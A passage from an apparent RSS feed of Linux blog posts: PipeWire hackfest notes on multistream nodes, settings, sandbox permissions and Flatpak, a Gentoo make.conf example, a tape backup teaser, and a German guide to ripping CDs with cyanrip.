must be manually assigned a specific data loop. There was some desire to have the ability for there to be a default data loop to make the manual management less cumbersome.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;ACP -&amp;gt; UCM: PipeWire inherits the ALSA card profile configuration from PulseAudio, which has been helpful in making the migration path smoother on most hardware. There was always some desire to have a single configuration system (probably ALSA UCM) for all hardware, but this likely needs some work on what we can express in UCM configuration, but we also need to clean up how we translate our UCM handling code (George has an &lt;a href=&quot;https://gitlab.freedesktop.org/pipewire/pipewire/-/issues/5027&quot;&gt;RFC for this&lt;/a&gt;).&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h3&gt;Thanks&lt;/h3&gt;&lt;p&gt;That’s it, thank you for reading if you made it this far, and a shout out to George, Mark, and others organising the event!&lt;/p&gt;&lt;p&gt;It was great to see continued interest and so much exciting work that is yet to come. I hope to see more of the community in the next edition of the hackfest.&lt;/p&gt;&lt;/div&gt;</content:encoded>
</item>
<item>
<title>Notes from the PipeWire Hackfest 2026: Part 1</title>
<link>https://arunraghavan.net/2026/06/notes-from-the-pipewire-hackfest-2026-part-1/</link>
<guid isPermaLink="false">RhweEAWGa_8tdKbA3g9DKUD4Cb1ReqpHDXyLCQ==</guid>
<pubDate>Mon, 22 Jun 2026 19:16:33 +0000</pubDate>
<description>(these notes are being posted in two parts to make the length more manageable, part 2 is here)</description>
<content:encoded>&lt;div&gt;&lt;p&gt;&lt;em&gt;(these notes are being posted in two parts to make the length more manageable, &lt;a href=&quot;https://arunraghavan.net/2026/06/notes-from-the-pipewire-hackfest-2026-part-2/&quot;&gt;part 2 is here&lt;/a&gt;)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The PipeWire community organised &lt;a href=&quot;https://gitlab.freedesktop.org/pipewire/pipewire/-/wikis/PipeWire-Hackfest-in-Nice---May-2026&quot;&gt;a hackfest in Nice&lt;/a&gt;, France, colocated with Embedded Recipes, the GStreamer hackfest, and a number of other events.&lt;/p&gt;
&lt;p&gt;In attendance were members of the upstream community, as well as folks interested in PipeWire from Collabora, Red Hat, Qualcomm, Stream Unlimited, Texas Instruments, and Valve. In some cases these were the same person wearing upstream and professional hats, as some of us often do! :)&lt;/p&gt;
&lt;p&gt;It was two days of fruitful and deep technical discussions, and lovely evenings hanging out in the Côte d’Azur. Shout out to &lt;a href=&quot;https://gkiagia.gr/&quot;&gt;George Kiagiadakis&lt;/a&gt; and Mark Filion for putting this together!&lt;/p&gt;
&lt;/div&gt;&lt;p&gt;
&lt;/p&gt;&lt;figure&gt;&lt;a href=&quot;https://arunraghavan.net/wp-content/uploads/nice-2026.jpg&quot;&gt;&lt;img src=&quot;https://arunraghavan.net/wp-content/uploads/nice-2026.jpg&quot; alt=&quot;A photo of the waters in Nice from a rooftop&quot; title=&quot;&quot;/&gt;&lt;/a&gt;&lt;figcaption&gt;Beautiful view of the Côte d’Azur&lt;/figcaption&gt;&lt;/figure&gt;&lt;div&gt;&lt;p&gt;The topics were disparate and can be somewhat esoteric for folks who are not familiar with the Linux audio space. I will try to strike a balance between providing context and summarising the finer details we discussed. Please feel free to write in if I missed or can expand on anything.&lt;/p&gt;
&lt;/div&gt;&lt;div&gt;&lt;h3&gt;Multistream nodes&lt;/h3&gt;
&lt;p&gt;A recurring topic for the last couple of years has been supporting multistream nodes. The PipeWire API currently offers a &lt;code&gt;pw_stream&lt;/code&gt; interface that can offer a node with single input &lt;em&gt;or&lt;/em&gt; output (closer to the PulseAudio API), and the &lt;code&gt;pw_filter&lt;/code&gt; interface that provides a lower-level freeform API to individually manage ports on a node (closer to the JACK API).&lt;/p&gt;
&lt;p&gt;The stream API while convenient, can be a bit unwieldy for realising concepts such as loopbacks and filters, because each set of inputs and outputs needs to be implemented as an individual node. If you’ve ever loaded the &lt;a href=&quot;https://docs.pipewire.org/page_module_loopback.html&quot;&gt;loopback module&lt;/a&gt;, for example, you would have noticed that there are two nodes created for each instance.&lt;/p&gt;
&lt;p&gt;Wim has created a version of the API that allows a node to provide multiple streams, which allows us to keep the conveniences of the stream API, but more easily express ideas like the loopbacks, filters, etc. Each stream is effectively a group of ports on the node, and nodes can have an arbitrary number of input and output streams.&lt;/p&gt;
&lt;p&gt;The &lt;a href=&quot;https://gitlab.freedesktop.org/wtaymans/pipewire/-/tree/filter-stream2?ref_type=heads&quot;&gt;code on the PipeWire side&lt;/a&gt; is ready. The primary idea is there will be a &lt;code&gt;PortConfig&lt;/code&gt; param per stream, and this is where the format of the stream, and other metadata expressed on port groups (which is essentially what a stream is) will live.&lt;/p&gt;
&lt;p&gt;We discussed what is needed in WirePlumber to make sure the linking logic adapts to this concept, and Julian will be implementing that in the coming weeks.&lt;/p&gt;
&lt;/div&gt;&lt;div&gt;&lt;h3&gt;Settings&lt;/h3&gt;
&lt;p&gt;PipeWire has a generic metadata system based on the JACK API that is used for storing metadata (allowing you to attach a key/type/value, optionally attached to an object). This is also used by WirePlumber to provide its settings system (see &lt;code&gt;wpctl settings&lt;/code&gt;), along with some key features such as a schema and persistence.&lt;/p&gt;
&lt;p&gt;We discussed that it might be nicer to have the concept of settings as a first-class citizen, and possibly even standardise some settings for desktop wide usage (such as common processing elements). There was consensus that:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A new settings interface (instead of extending metadata) would make sense&lt;/li&gt;
&lt;li&gt;The API should be asynchronous, and can fail&lt;/li&gt;
&lt;li&gt;A schema for valid settings and their types could be exposed as a well-known metadata key&lt;/li&gt;
&lt;li&gt;Implementors of the interface would perform validation&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;&lt;div&gt;&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;We spoke about the current state of security for applications using PipeWire. For context, PipeWire has a fine-grained permissions model where each client can have selective access to what objects are visible to it, and what actions it may perform. There is also a less granular system, where a “manager” application can connect to the manager socket for full access. We broadly think about restricted security for sandboxed applications (primarily Flatpak).&lt;/p&gt;
&lt;p&gt;One scenario is sandboxed PulseAudio applications getting full access via the &lt;code&gt;pipewire-pulse&lt;/code&gt; server on the host. The discussion on this concluded that there &lt;em&gt;is&lt;/em&gt; a way for &lt;code&gt;pipewire-pulse&lt;/code&gt; to forward enough security-related information from sandboxed applications for us to apply sandbox restrictions to them, and we need to make that system work.&lt;/p&gt;
&lt;p&gt;There was a discussion that it might be reasonable for our default policies to apply for all applications connecting to the regular PipeWire socket to be restricted (this does not prevent malicious applications from accessing the manager socket, but helps applications not do bad things erroneously).&lt;/p&gt;
&lt;p&gt;This might be disruptive to introduce as a default change, so we might implement it via an opt-in setting so that there can be some broader testing and refinement of default permissions before flipping the switch for all users.&lt;/p&gt;
&lt;p&gt;There are a number of mechanisms related to how security context properties are relayed, and how those properties are used by WirePlumber to determine permissions. We need to document and verify the expected behaviour here.&lt;/p&gt;
&lt;h3&gt;Flatpak and Portals&lt;/h3&gt;
&lt;p&gt;Relatedly there was a discussion about how things should fit in with Flatpak, and Sebastian Wick from the Flatpak team joined us briefly on the second day.&lt;/p&gt;
&lt;p&gt;There was some discussion of making sure the PulseAudio socket is provided to the sandbox in a similar way to the PipeWire socket, such that some additional security properties can be assigned from the host in a way that the sandboxed client cannot override.&lt;/p&gt;
&lt;p&gt;We agreed that we needed the ability for applications to specify with some granularity what permissions they require (via portals), and for us to grant only that (with user intervention, if needed). Broadly this is:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Playback (optionally enumeration of sinks)&lt;/li&gt;
&lt;li&gt;Capture (optionally enumeration of sources)&lt;/li&gt;
&lt;li&gt;Default visibility of only the application’s own nodes&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We also spoke about how we might want to associate PipeWire objects with applications. With Flatpak moving to using a cgroup for each application, this should become easier. We may also want to be able to have a way to associate a stream with a specific window (to, for example, share a window and its audio), which should be possible.&lt;/p&gt;
&lt;p&gt;It was also noted that for some classes of applications, we may want a way for users to allow some of these permissions at install time (for example, a remote desktop application asking permission on every start can be annoying). This is already possible with Flatpak manifests (which are static, but we might need to add some more options here), and there is a potential entitlement system being discussed (for server-driven overrides to be distributed for malicious applications, for example).&lt;/p&gt;
&lt;/div&gt;&lt;div&gt;&lt;h3&gt;Encapsulation and Collections&lt;/h3&gt;
&lt;p&gt;One topic that came up last year is the ability to encapsulate a group of nodes such that they appear as a single node to other applications in the system. This could be useful for:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Collapsing all the output from an application so it appears to be providing a single stream&lt;/li&gt;
&lt;li&gt;Grouping all the filters for a sink or source node, and making it appear as a single node with all the processing hidden away&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;One piece to making such a system possible is to have a first-class notion of this group. Julian has an implementation of such an entity, called a “collection”. This is currently implemented on top of PipeWire metadata, but we agree that this is likely worth having an explicit PipeWire interface for.&lt;/p&gt;
&lt;p&gt;Once that is in place, we discussed the possibility of having a smarter “proxy” node that can act as the interface that translates from the “outside” of the encapsulated region to the “inside”, so that format selection, volume changes, etc. can properly be proxied to the underlying device, for example.&lt;/p&gt;
&lt;/div&gt;&lt;div&gt;&lt;h3&gt;Tooling improvements&lt;/h3&gt;
&lt;p&gt;It was noted that the tools we have (such as &lt;code&gt;pw-top&lt;/code&gt; and &lt;code&gt;pw-dot&lt;/code&gt;) can make it hard to get at some information, such as negotiated formats, rates, etc. They can also be “noisy” when we have a large number of filters and loopbacks.&lt;/p&gt;
&lt;p&gt;While we did not have a concrete plan to tackle this, some of us have been playing with LLM-based tooling to generate some helper code for this sort of thing. At least my attempts have been too sloppy to share as yet, but it should be possible to get something useful with a structured approach.&lt;/p&gt;
&lt;/div&gt;&lt;div&gt;&lt;p&gt;That’s it for now. Watch this space for &lt;a href=&quot;https://arunraghavan.net/2026/06/notes-from-the-pipewire-hackfest-2026-part-2/&quot;&gt;part 2&lt;/a&gt;!&lt;/p&gt;
&lt;/div&gt;</content:encoded>
</item>
<item>
<title>Adventures with Tape</title>
<link>https://nickvsnetworking.com/adventures-with-tape/</link>
<guid isPermaLink="false">3Oeo2TFNdiNImvk6KOsCwUgBXeZngWkZKKBNbA==</guid>
<pubDate>Sun, 21 Jun 2026 11:25:19 +0000</pubDate>
<description>For a long time I’ve run my own backups to a portable hard drive using Duplicity / Dejavu. It’s worked really well, it’s dammed slow to pull back a file I’ve accidentally deleted, or need an old version of (which I probably go back to every 6 months or so), but it’s fast to backup, … Continue reading Adventures with Tape→</description>
<content:encoded>For a long time I’ve run my own backups to a portable hard drive using Duplicity / Dejavu. It’s worked really well, it’s dammed slow to pull back a file I’ve accidentally deleted, or need an old version of (which I probably go back to every 6 months or so), but it’s fast to backup, … &lt;a href=&quot;https://nickvsnetworking.com/adventures-with-tape/&quot;&gt;Continue reading &lt;span&gt;Adventures with Tape&lt;/span&gt;&lt;span&gt;→&lt;/span&gt;&lt;/a&gt;</content:encoded>
</item>
<item>
<title>Gentoo make.conf example file</title>
<link>https://daulton.ca/2018/08/gentoo-make-conf/</link>
<guid isPermaLink="false">y4XEKmAnrUOCAwsJmPdtQlBLalpPjzrZVklRZQ==</guid>
<pubDate>Sun, 21 Jun 2026 01:01:25 +0000</pubDate>
<description>Gentoo make.conf example file</description>
<content:encoded>&lt;p&gt;This is my current &lt;a href=&quot;https://wiki.gentoo.org/wiki//etc/portage/make.conf&quot;&gt;make.conf&lt;/a&gt;, I am sharing it for the sake of reference.&lt;/p&gt;&lt;p&gt;Please do not copy it directly, the global USE flags, VIDEO_CARDS, CPU_FLAGS_X86 likely would not suite your installation or supported CPU extensions. For those things as well as FEATURES you will want to customize it to your needs and liking.&lt;/p&gt;&lt;pre&gt;&lt;code&gt;# Please consult /usr/share/portage/config/make.conf.example for a more detailed example.

CFLAGS=&amp;quot;-O2 -pipe -march=native&amp;quot;
CXXFLAGS=&amp;quot;${CFLAGS}&amp;quot;

WARNING: Changing your CHOST is not something that should be done lightly.
Please consult http://www.gentoo.org/doc/en/change-chost.xml before changing.
CHOST=&amp;quot;x86_64-pc-linux-gnu&amp;quot;

# Use the &amp;#39;stable&amp;#39; branch - &amp;#39;testing&amp;#39; no longer required for Gnome 3.
ACCEPT_KEYWORDS=&amp;quot;amd64&amp;quot;

# USE flags
# These are global, change accordingly to your desired configuration and read the wiki for your window manager or desktop 
# environment since specific use flags may be recommended such as how XFCE does.
# These are for a KDE system on a hardened profile.
USE=&amp;quot;branding bindist ipv6 consolekit gpm mtp opengl X dbus -modemmanager jpeg \
lock session startup-notification -wireless udev -gnome -systemd -minimal alsa semantic-desktop phonon \
exif glamor qt3support mtp infinality pam tcpd ssl spell flac vorbis cups xinerama xscreensaver \
truetype infinality xcb udisks upower egl policykit png pdf mp3 x264 mng tiff xml ogg pngsdl \
-wifi -handbook -mysql lcms xcomposite libnotify qml kipi custom-cflags custom-optimization \
gtk gtk2 qt5 -qt4 kde -cups networkmanager&amp;quot;

# Video cards for X11 drivers
# https://wiki.gentoo.org/wiki/Template:VIDEO_CARDS
# Additionally check out the wiki page for your vendors video cards
VIDEO_CARDS=&amp;quot;radeon radeonsi vesa fbdev&amp;quot;

# Input devices for Xorg
# If you have a touch pad add &amp;#39;synaptics&amp;#39;
INPUT_DEVICES=&amp;quot;evdev keyboard mouse&amp;quot;

# Make concurrency level
# -j should be total amount of cores/threads - 1 usually. So a system with 8 cores/threads might have 7 here
MAKEOPTS=&amp;quot;-j7 -l8&amp;quot;

# Supported CPU flags to be used for USE
# Use app-portage/cpuid2cpuflags to find your CPUs supported flags and then put them here. Then recompile packages that have 
# support for those new CPU flags: emerge --ask --changed-use --deep @world
CPU_FLAGS_X86=&amp;quot;mmx mmxext sse sse2 sse3 ssse3&amp;quot;

# Gentoo mirrors
# Change accordingly to nearby mirrors https://gentoo.org/downloads/mirrors/
GENTOO_MIRRORS=&amp;quot;rsync://rsync.gtlib.gatech.edu/gentoo ftp://gentoo.netnitco.net/pub/mirrors/gentoo/source/ \
rsync://gentoo.cs.uni.edu/gentoo-distfiles&amp;quot;

# FEATURES defines actions portage takes by default. This is an incremental
# variable. See the make.conf(5) man page for a complete list of supported
# values and their respective meanings. 

# For the webrsync-gpg feature addtional configuration is required outside of the make.conf 
# https://wiki.gentoo.org/wiki/Sakaki%27s_EFI_Install_Guide/Using_Your_New_Gentoo_System#Switching_to_emerge-webrsync_for_Security_.28Optional.29

FEATURES=&amp;quot;webrsync-gpg sandbox sign userpriv usersandbox sfperms userfetch strict parallel-fetch&amp;quot;

# If the ccache feature is enabled, leave this
# CCACHE_SIZE=&amp;quot;2G&amp;quot;

# This will install the keyring to the /var/lib/gentoo/gkeys/keyrings/gentoo/release 
# location. 
PORTAGE_GPG_DIR=&amp;quot;/var/lib/gentoo/gkeys/keyrings/gentoo/release&amp;quot;

# Disable &amp;#39;emerge --sync&amp;#39; so emerge-webrsync has to be used
SYNC=&amp;quot;&amp;quot;

# EMERGE_DEFAULT_OPTS allows emerge to act as if certain options are specified on every run.
# Useful options include --ask, --verbose, --usepkg and many others. Options that are not
# useful, such as --help, are not filtered. 
EMERGE_DEFAULT_OPTS=&amp;quot;--quiet-build=y --keep-going --jobs=8 --load-average=8&amp;quot;

# languages for localization reference below link
# https://wiki.gentoo.org/wiki//etc/portage/make.conf#LINGUAS
LINGUAS=&amp;quot;en en_US en_GB&amp;quot;
L10N=&amp;quot;en en-US en-GB&amp;quot;&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;After making changes to INPUT_DEVICES, VIDEO_CARDS, USE, etc you should update the system using the following command so the changes take effect:&lt;/p&gt;&lt;pre&gt;&lt;code&gt;emerge --ask --changed-use --deep @world&lt;/code&gt;&lt;/pre&gt;</content:encoded>
</item>
<item>
<title>Audio-CDs rippen unter Linux mit cyanrip</title>
<link>https://frunc.de/how-to/audio-cds-rippen-linux-cyanrip/</link>
<enclosure type="image/jpeg" length="0" url="https://frunc.de/wp-content/uploads/2026/06/cd-stapel-640x464.jpg"></enclosure>
<guid isPermaLink="false">K_M7wicEeRvtZpWCBZFXxOqrk1Q5f1oW4UF9GA==</guid>
<pubDate>Sat, 20 Jun 2026 14:10:34 +0000</pubDate>
<description>Eine Anleitung, wie man mithilfe von cyanrip unter Linux schnell und einfach Audio-CDs rippen und in FLAC oder MP3 konvertieren kann.</description>
<content:encoded>&lt;p&gt;Eine Anleitung, wie man mithilfe von cyanrip unter Linux schnell und einfach &lt;strong&gt;Audio-CDs rippen&lt;/strong&gt; und &lt;strong&gt;in FLAC oder MP3 konvertieren&lt;/strong&gt; kann.&lt;/p&gt;&lt;p&gt;CD-Sektionen in Second-Hand-Stores zu durchstöbern, finde ich enorm vergnüglich. Die dabei erworbenen Schätzchen wandle ich, zu Hause angekommen, natürlich sofort in FLAC-Dateien um, man ist ja nicht umsonst Digital Native und Datenhorder. Die Files landen dann auf meinem Navidrome-Server, auf den ich von überall per Webbrowser und per App zugreifen kann.&lt;/p&gt;&lt;p&gt;Nach meinem kürzlichen OS-Umstieg habe ich einige Zeit gebraucht, um einen robusten Workflow zum CD-Rippen unter Linux zu finden. Ich skizziere den hier mal, vielleicht hilft’s ja jemandem. &lt;del&gt;Auf jeden Fall mir, wenn ich in zwei Wochen schon wieder vergessen habe, wie es geht.&lt;/del&gt;&lt;/p&gt;&lt;h2&gt;cyanrip installieren&lt;/h2&gt;&lt;p&gt;Zum Rippen setze ich das Kommandozeilen-Tool &lt;a href=&quot;https://github.com/cyanreg/cyanrip&quot;&gt;cyanrip&lt;/a&gt; ein. Es ist schnell und schmal, soll außerdem eine ähnlich gute Fehlertoleranz bei zerkratzten CDs wie das gottgleiche &lt;abbr&gt;EAC&lt;/abbr&gt; unter Windows haben.&lt;/p&gt;&lt;p&gt;Unter CachyOS, Arch und Arch-Sprösslingen kann man cyanrip mit&lt;/p&gt;&lt;pre&gt;&lt;code&gt;yay -S cyanrip&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;installieren. Unter Ubuntu, Mint und anderen Debian-Derivaten wirft man&lt;/p&gt;&lt;pre&gt;&lt;code&gt;apt install cyanrip&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;in die Konsole. Installationsanweisungen für andere Distributionen und FreeBSD findet man &lt;a href=&quot;https://github.com/cyanreg/cyanrip#installation&quot;&gt;auf der GitHub-Seite&lt;/a&gt;, einen Installer für Windows kann man sich bei den &lt;a href=&quot;https://github.com/cyanreg/cyanrip/releases&quot;&gt;Releases&lt;/a&gt; hinabzupfen.&lt;/p&gt;&lt;h2&gt;Offset ermitteln&lt;/h2&gt;&lt;p&gt;Nach der Installation muss man einmalig den sogenannten Offset-Wert herausfinden. Der ist abhängig vom Laufwerk, ihn muss man beim Rippen immer angeben.&lt;/p&gt;&lt;p&gt;Dazu lege ich eine möglichst populäre Audio-CD ins Laufwerk und gebe den Befehl&lt;/p&gt;&lt;pre&gt;&lt;code&gt;cyanrip -f&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;in die Konsole ein. Falls die CD in der AccuRip-Datenbank bekannt ist, erhält man eine Ausgabe, die ungefähr so anfängt:&lt;/p&gt;&lt;pre&gt;&lt;code&gt;Searching for drive offset, enabling AccuRip and disabling MusicBrainz and Cover art fetching...
Checking /dev/cdrom for cdrom...
                CDROM sensed: HL-DT-ST DVDRAM GH24NSB0  LM01 SCSI CD-ROM


Opening drive...
Loading data for track 1...
Data loaded, searching for offsets...
Offset of +6 found in track 1, trying to confirm with another track
Loading data for track 2...
Data loaded, searching for offsets...
Offset of +6 confirmed (confidence: 2) in track 2, trying to confirm with another track&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Wichtig ist die Information „Offset of +6 found“. Wenn das drei, vier Male da steht, darf das als bestätigt gelten, dann kann man den Ermittlungsprozess auch abbrechen (&lt;key&gt;Strg&lt;/key&gt; + &lt;key&gt;C&lt;/key&gt;).&lt;/p&gt;&lt;p&gt;Der Offset-Wert bei meinem verwendeten Laufwerk ist also 6, bei deinem Laufwerk ist er vielleicht anders. Den Offset-Wert einfach merken, neben das Admin-Passwort per Post-It an den Monitor kleben, mit Edding aufs Laufwerk schreiben oder auf die Wade tätowieren lassen – gibt ja genug Möglichkeiten. Im Folgenden gebe ich alle Befehle mit meinem Offset-Wert von 6 an.&lt;/p&gt;&lt;h2&gt;Metadaten identifizieren&lt;/h2&gt;&lt;p&gt;Die Eingabe von Metadaten, also Song- und Albumtiteln, kann man sich bei den meisten CDs sparen. Denn ein Großteil der kommerziellen CDs ist schon in der Community-gepflegten &lt;a href=&quot;https://musicbrainz.org/&quot;&gt;MusicBrainz-Datenbank&lt;/a&gt; enthalten. Allerdings muss die einzigartige ID der CD (DiscID) einem einzigen Release in der MusicBrainz-Datenbank zugeordnet sein. Hier gibt es manchmal Sonderfälle und leicht unterschiedliche Szenarien.&lt;/p&gt;&lt;p&gt;Wir geben jetzt den Befehl&lt;/p&gt;&lt;pre&gt;&lt;code&gt;cyanrip -I&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;(großes i, kein kleines L!) ein und schauen uns die Konsolen-Ausgabe an.&lt;/p&gt;&lt;h3&gt;Variante 1: Der DiscID ist ein Release zugeordnet&lt;/h3&gt;&lt;p&gt;Das wird der häufigste Fall sein. Wenn die CD und die Tracks offensichtlich erkannt werden und relativ am Anfang der langen (!) Konsolen-Ausgabe etwas steht wie …&lt;/p&gt;&lt;pre&gt;&lt;code&gt;Found MusicBrainz release: [Name der CD]&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;… ist das super. Heißt nämlich, dass nichts weiter getan werden muss und wir direkt zum Teil „CD rippen“ weiter unten springen können.&lt;/p&gt;&lt;h3&gt;Variante 2: Der DiscID sind mehrere Releases zugeordnet&lt;/h3&gt;&lt;p&gt;Wenn der Output ungefähr so aussieht …&lt;/p&gt;&lt;pre&gt;&lt;code&gt;Multiple releases found in database for DiscID PmK_Kg1r_ND6zc1h51tErEbX2IM-:
    1 (ID: 712d55b2-9f62-4823-96d9-9e94efa88c07): Jelängerjelieber (DE) (2004)
    2 (ID: 82718613-f2c3-3f39-869d-a047f21e0041): Jelängerjelieber (ltd.) (DE) (2 CDs) (2005-06-13)&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;wurden mehrere CD-Varianten gefunden. Die erste ist hier das reguläre Album „Jelängerjelieber“ der Band Klee, das zweite eine inhaltsgleiche Disc, aber als Teil einer Doppel-CD. Oft sind′s auch verschiedene Ländervarianten. Ich habe das Klee-Album jedenfalls als Einzel-CD, also merke ich mir den Eintrag in der Liste (1) oder kopiere mir die ID (die lange Zeichenfolge, die mit 712d55b2 beginnt).&lt;/p&gt;&lt;h3&gt;Variante 3: Die CD wird nicht erkannt&lt;/h3&gt;&lt;p&gt;Eher selten spuckt die Konsole so etwas aus:&lt;/p&gt;&lt;pre&gt;&lt;code&gt;Unable to find release info for this CD, and metadata hasn&amp;#39;t been manually added!
Please help improve the MusicBrainz DB by submitting the disc info via the following URL:
[lange URL]&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Das bedeutet, dass die CD nicht auf Anhieb erkannt wird. Aber selbst dann kommen wir oft noch ums manuelle Eintragen der Metadaten herum. Denn häufig ist die jeweilige CD nämlich durchaus in der MusicBrainz-Datenbank erfasst, nur eben nicht der spezifischen DiscID zugeordnet.&lt;/p&gt;&lt;p&gt;Wir rufen die URL auf, die in der Konsole steht – entweder per Klick mit gedrückter &lt;key&gt;Strg&lt;/key&gt;-Taste oder per Copy &amp;amp; Paste. Auf der folgenden Seite können wir den Katalog nach Veröffentlichungen durchsuchen und, falls vorhanden, die CD der Veröffentlichung zuweisen. (Dafür ist möglicherweise ein kostenloser MusicBrainz-Account notwendig.)&lt;/p&gt;&lt;p&gt;Sobald die CD registriert ist, kann man ganz normal in der Konsole weitermachen.&lt;/p&gt;&lt;p&gt;Aber was, wenn die CD auch bei MusicBrainz unbekannt ist? Dann kann man sie als neuen Release hinzufügen. Klar, das ist etwas aufwändiger und zeitintensiv. Aber: Einmal hinzugefügt, kann in Zukunft auch jeder andere Nutzer auf die Daten zugreifen und diese CDs automatisch rippen lassen. Weil man bei vielen anderen Rips ja von der Vorarbeit der Community profitiert, kann man das ruhig mal machen, finde ich.&lt;/p&gt;&lt;p&gt;Falls man keine Lust hat oder es sowieso nicht sinnvoll ist, bei privaten Aufnahmen oder Mixtapes zum Beispiel, kann man es natürlich auch lassen. In so einem Fall rippe ich einfach ohne Titel und füge die im Nachgang mit mp3tag hinzu, dazu später mehr.&lt;/p&gt;&lt;h2&gt;CD rippen&lt;/h2&gt;&lt;p&gt;Der Befehl zum Rippen sieht, Stand jetzt, so aus:&lt;/p&gt;&lt;pre&gt;&lt;code&gt;cyanrip -s 6 -R 1 -T simple&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
&lt;li&gt;Das &lt;code&gt;-s 6&lt;/code&gt; ist der Offset für mein Laufwerk, siehe oben.&lt;/li&gt;
&lt;li&gt;Das &lt;code&gt;-R 1&lt;/code&gt; bewirkt, dass bei mehreren gefundenen Ergebnissen die erste CD-Variante in der eben ermittelten Liste für Metadaten herangezogen wird.&lt;/li&gt;
&lt;li&gt;Das &lt;code&gt;-T simple&lt;/code&gt; bewirkt, dass exotische Sonderzeichen bei Verzeichnis- und Dateinamen vermieden werden. Auf Windows-Systemen gibt es sonst Probleme.&lt;/li&gt;
&lt;/ul&gt;&lt;p&gt;Standardmäßig wird ins FLAC-Format gerippt. Das heißt: Man bekommt Dateien, die zwar groß, aber verlustfrei komprimiert und damit perfekt zum Archivieren geeignet sind. Wer lieber kleinere Files haben möchte, kann den Parameter &lt;code&gt;-o&lt;/code&gt; ergänzen. Mit&lt;/p&gt;&lt;pre&gt;&lt;code&gt;cyanrip -s 6 -R 1 -T simple -o mp3 -b 256&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;erhält man MP3-Dateien in Beinahe-CD-Qualität, die nur einen Bruchteil des Dateigewichts haben. Wer sich nicht entscheiden kann, bekommt mit&lt;/p&gt;&lt;pre&gt;&lt;code&gt;cyanrip -s 6 -R 1 -T simple -o flac,mp3 -b 256&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;sogar beides, also FLAC- und MP3-Dateien. Ich mache für diesen Artikel aber mit FLAC weiter, den Parameter &lt;code&gt;-o&lt;/code&gt; lasse ich also weg.&lt;/p&gt;&lt;p&gt;Die gerippten Files landen normalerweise im eigenen home-Verzeichnis in einem Unterverzeichnis mit dem Namen &lt;code&gt;Albumname [FLAC]&lt;/code&gt;. Das ist weder schön noch übersichtlich. Stattdessen kann man cyanrip auch gleich mitgeben, wie man Verzeichnis- und Dateinamen haben möchte. Da hat jede:r seine Präferenzen. Ich bin nach einigem Herumprobieren schließlich bei diesem Befehl gelandet:&lt;/p&gt;&lt;pre&gt;&lt;code&gt;cyanrip -s 6 -R 1 -T simple -D &amp;quot;CD-Rips/{album_artist}/{album_artist} - {album} ({date}){if #totaldiscs# &amp;gt; #1#/CD|disc|}&amp;quot; -F &amp;quot;{track}{if #artist# != #album_artist# - |artist|} - {title}&amp;quot;&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Das sieht komplizierter aus, als es ist. Mit dem Befehl weise ich cyanrip an, in einen Unterordner &lt;code&gt;CD-Rips&lt;/code&gt; die Tracks nach dem Schema &lt;code&gt;/Künstler/Künstler - Albumtitel (Jahr)/Track - Tracktitel.flac&lt;/code&gt; zu rippen. Zwei Sonderfälle werden zusätzlich berücksichtigt:&lt;/p&gt;&lt;ul&gt;
&lt;li&gt;Bei CDs mit verschiedenen Künstlern oder Einzeltracks mit Featured Artists werden die Künstler zusätzlich in den Dateinamen geschrieben.&lt;/li&gt;
&lt;li&gt;Bei Doppel- und Mehrfach-CDs werden für jede Disc Unterordner erstellt.&lt;/li&gt;
&lt;/ul&gt;&lt;div&gt;&lt;a href=&quot;https://i0.wp.com/frunc.de/wp-content/uploads/2026/06/cyanrip-konsole.png?ssl=1&quot;&gt;&lt;img src=&quot;https://i0.wp.com/frunc.de/wp-content/uploads/2026/06/cyanrip-konsole.png?resize=700%2C426&amp;amp;ssl=1&quot; alt=&quot;Screenshot: Konsolenausgabe während eines Rip-Vorgangs mit cyanrip.&quot; title=&quot;&quot;/&gt;&lt;/a&gt;&lt;p&gt;Schmucklos, aber schnell: Wenn cyanrip loslegt und die CD mitspielt, landet deren Inhalt schnell auf der Festplatte.&lt;/p&gt;&lt;/div&gt;&lt;p&gt;Wenn man „seinen“ Befehl gefunden und in die Konsole gehackt hat, geht das Gerippe (haha) los. Die Dauer variiert je nach Zerkratzungsgrad der CD, Laufwerksgeschwindigkeit und CPU-Power, grob kann man aber bei einem halbwegs normalen Rechner eine Geschwindigkeit erwarten, die drei- bis fünfmal so schnell wie die Gesamtdauer der CD ist.&lt;/p&gt;&lt;h2&gt;Metadaten beackern, Coverbilder ergänzen&lt;/h2&gt;&lt;p&gt;Nach dem Rippen jage ich die Tracks grundsätzlich noch einmal durch den ohnehin unersetzlichen Metadaten-Anreicherer &lt;a href=&quot;https://picard.musicbrainz.org/&quot;&gt;MusicBrainz Picard&lt;/a&gt;, um auch wirklich den letzten Rest an fehlenden Metadaten zu ergänzen und Coverbilder zu ergänzen.&lt;/p&gt;&lt;p&gt;In schwierigen Fällen oder wenn ich keine Metadaten habe, bearbeite ich die Trackdaten auch per Hand. Unter Windows habe ich dafür immer &lt;a href=&quot;https://www.mp3tag.de/&quot;&gt;mp3tag&lt;/a&gt; genutzt. Unter Linux gibt es das ähnlich aufgebaute &lt;a href=&quot;https://docs.puddletag.net/download.html&quot;&gt;puddletag&lt;/a&gt;, mit dem ich aber trotzdem irgendwie nicht richtig zurechtkomme. Supererweise läuft mp3tag, per Wine emuliert, auch ganz brauchbar unter Linux.&lt;/p&gt;&lt;h3&gt;Tipp zu 